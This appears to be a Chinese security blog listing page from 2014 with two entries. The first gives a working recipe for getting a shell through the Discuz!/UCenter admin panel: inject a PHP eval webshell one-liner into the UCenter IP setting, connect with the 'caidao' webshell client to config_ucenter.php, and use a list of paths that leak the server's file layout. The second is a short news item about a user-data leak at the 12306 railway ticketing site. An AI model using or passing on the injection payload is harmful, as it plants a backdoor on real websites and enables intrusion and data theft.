• 后台拿shell 需要有管理员帐号及密码,进入后台打开站长----ucenter设置,直接在UCenter IP 地址:里面插入一句话 xxoo\\');eval($_POST[a])?>;// 就ok ,然后菜刀连接 http://XXX.com/config/config_ucenter.php 密码a 爆路径文件如下: /uc_server/control/admin/db.php/source/plugin/myrepeats/ table/table_myrepeats.php/install/include/install_lang.php
    作者:熊猫| 发布:2014年1月22日| 阅读:7,088次| 分类:PHP, 漏洞列表, 编程语言| 标签:,
  • 标题:12306再曝泄露用户信息漏洞 网站目前未回应   新京报讯(记者 刘春瑞)继曝出12306网站因串号问题泄露用户信息漏洞后,第三方漏洞平台乌云网再曝出12306某接口CDN问题导致用户信息泄露。 发现漏洞的作者“ZoomZhao”表示,12306网站 某接口由于权限及 CDN 缓存导致可以获取用户信息。该漏洞的危险等级为高级。目前12306网站尚未对此回应。
    作者:熊猫| 发布:2014年1月02日| 阅读:1,551次| 分类:业界资讯| 标签: